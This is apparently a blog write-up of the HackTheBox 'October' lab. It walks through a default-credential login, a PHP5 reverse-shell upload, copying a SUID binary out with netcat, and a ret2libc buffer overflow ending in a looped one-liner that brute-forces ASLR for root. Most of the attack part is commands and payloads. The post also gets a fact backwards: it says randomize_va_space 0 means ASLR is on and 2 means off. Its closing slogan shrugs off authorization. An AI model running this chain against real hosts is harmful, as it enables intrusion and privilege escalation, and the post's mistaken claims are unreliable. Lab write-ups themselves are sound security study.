HackTheBox October Walkthrough - Buffer Over Flow Exploitation & ASLR Brute Force

Hello Friends, Here is one of the most interesting topics for hackers, guess what – Buffer overflow and ASLR brute forcing to get a root shell. To test this out I got a great box (machine) from HackTheBox called October. I know this is a very old machine and got lot of walkthroughs – but I felt like most of them are hard to understand for beginners. So, here is a HackTheBox October Walkthrough which deals with October CMS, through which we need to make a way to get a shell on the machine (which would be a limited shell) and through little bit of enumeration you will get a weird file with SUID permissions (which can run root permissions- in simple terms). We need to perform a buffer overflow exploitation on that to get a root shell but ASLR on the machine is turned on. Its gonna be very interesting.

This is my very first HackTheBox walkthrough. I thought of starting with something interesting. So, here is the walkthrough for October Machine. As usual we are gonna start with simple Reconnaissance with nmap and dirb. The first thing i do when I start to crack a machine is to check the services that are running on the machine and proceed according to that.

nmap -sS -sV -A -o oct.nmap 10.10.10.16

# Nmap 7.70 scan initiated Sat Jul 27 17:51:10 2019 as: nmap -sS -sV -A -o oct.nmap 10.10.10.16
Nmap scan report for 10.10.10.16
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   297.95 ms 10.10.14.1
2   298.12 ms 10.10.10.16

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 27 17:51:50 2019 -- 1 IP address (1 host up) scanned in 41.50 seconds

Port 80 is running on this machine, lets go and check it out. Here we can find the "October CMS" running.

When searched about October CMS, I found the default login page --> http://10.10.10.16/backend. Lets try Logging in with a simple guess of “admin/admin” and its successfully logged in.

While gathering info about October CMS, I found many vulnerabilities from https://www.exploit-db.com/exploits/41936 you can go through this for reference. There is a very useful vulnerability – which allows us to upload any php files but only php5 files. We can create a php reverse shell and get a shell on our machine. You could use any kind of php reverse shell, usually i Prefer the PHP reverse shell from Pentester Money, you can download and edit it and it works almost every time.

You need to change the IP address and port accordingly.

As per the exploit-db.com vulnerabilities, October CMS takes only .php5 files as input in the Image section. So, rename PHP to PHP5.

Go to Media --> upload

Select the edited PHP-reverse-shell.php5 file

As we are going to establish a reverse shell, Lets start netcat listening

nc -nvlp 9001

Run the reverse shell to get a user shell on netcat listening terminal

What we got is a limited shell, so to get an interactive shell, use python pty.

python -c 'import pty;pty.spawn("/bin/bash")'

Go to /home directory and you can find a user named harry, you can find user.txt in harry's directory.

After enumerating for sometime, i tried to search for files with SUID permissions and found a weird file named ovrflw --> obviously name itself says over flow, by which we can guess --> this might lead into a buffer overflow and we can get a root shell by exploiting this.

\find / -perm -4000 2>/dev/null

Lets check the details of the file. we can see that ovrflw is a ELF 32-bit Least Significant Bit executable.

file /usr/local/bin/ovrflw

As it is a executable, lets test it on our machine first. Later it can be exploited on the target machine. So lets transfer the ovrflw file using nc. I tried transferring the binary using python server, but for some reason that didn't work.

nc -l -p 8003 > ovrflw              /on your kali

nc -w 5 YourIpAddress 8003 < ovrflw     /on Target

Exploit Development Phase:

Requirements:

GDB Debugger & Peda

apt-get install gdb

git clone https://github.com/longld/peda.git ~/peda

echo "source ~/peda/peda.py" >> ~/.gdbinit

After you are done with installing the two binaries, we are good to go. Lets start debugging the ovrflw application.

To Run GDB

gdb ./ovrflw

To Check ASLR Status: we can see that ASLR is disabled on this application.

aslr

Lets Disassemble the main function to see all the functions this application is using. I am pretty happy after seeing "strcpy" function, because i am not a pro in assembly and buffer overflow exploitation, but i know how strcpy works and the way to exploit it :)

pdisass main

Along with that i ran "checksec" to check which security protections are enabled on the application.

checksec

We have NX Enabled and RELRO - Partial, so what are those ?

NX BIT: The NX Bit (no-execute) is used to segregate areas of memory for use of processing instructions and storing data. NX bit may mark certain areas of memory as non-executable. The processor will then refuse to execute any code residing in these areas of memory.Executable space protection, is a technique used to prevent certain types of malicious software from taking over computers by inserting their code into another program's data storage area and running their own code from within this section, this is nothing but buffer over flow.

RELRO: Relocation Read-only:

RELRO is a mitigation technique used to harden the sections of an ELF binary/application/process. There are two modes in RELRO, partial and full. In Partial RELRO data sections (.data and .bss) are reordered so that they can come after the ELF internal data sections, exploitation is still possible in partial RELRO because GOT is still writable here. In Full RELRO it can mitigate the process of modifying the GOT entry to get control of the program. This is done by making the entire GOT as read-only.

So, in our case NX is enabled and RELRO is partial which can be exploitable as .got is writable.

Lets try over flowing our little binary. we can use pattern create to create some random data to pass it as an input to get a break point.

pattern create 150

Lets send the random garbage data as an input in gdb to find out how many bytes we need to overwrite EIP register. we can see that 0x41384141 is our break point.

r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Now we need to find the pattern offset, so that we can find after how many characters our application/binary is breaking. we need to check the offset of the EIP register that is 0x41384141. By running the pattern_offset command we found out the binary break point is after 112 characters.

pattern_offset 0x41384141

If you want to find the EBP and EIP values, you can use the command

pattern_search

OK, Everything is good untill now. Lets shift to the target machine and develop our exploit. we need few more things to get a shell, the main part is the address of "/bin/sh" and "system". Also, we need exit address as well.

we need to point our "/bin/sh" address to "system" so that we can get a shell. Lets start with finding the system address.

p system                          / 0xb759c310

To find the address of "/bin/sh" add some value to the "system" and use it along with find command.

find 0xb759c310, +9999999, "/bin/sh"            /0x76bebac

Lets confirm the address of "/bin/sh" in gdb using the following command

x/s 0xb76bebac

In the same way find the address of "exit" as well. Exit Address is "0xb758f260"

p exit

Here comes the main part, ASLR on target machine is active, you can check this by

cat /proc/sys/kernel/randomize_va_space

if the output is "0" then ASLR is enabled, here it is active

if the output is "2", then ASLR is disabled.

ASLR randomizes the offset location of the memory. So, we need to brute force all the possible addresses and find the exact one. we need to make an exploit with all 4 values we got.

A * 112          offset
0xb759c310       system
0xb758f260    exit
0xb76bebac       /bin/sh

We need to make an exploit with all 4 values we got. The order to make the exploit is offset A*112 + System + Exit + /bin/sh. we need to send the values in little Endian format only.

so the final exploit looks like this

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done

It Might take a maximum of 5 mins to brute force and get the shell, wait for it.

That's it here is the root and root.txt Enjoy !!!!!!!

================== HACKING DREAM ===================

Main Principle of My Hacking Dream is to Promote Hacking Tricks and Tips to All the People in the World, So That Everyone will be Aware of Hacking and protect themselves from Getting Hacked. Hacking Don’t Need Agreements.

I Will Be Very Happy To Help You, So For Queries or Any Problem Comment Below or You Can Mail Me At Bhanu@HackingDream.net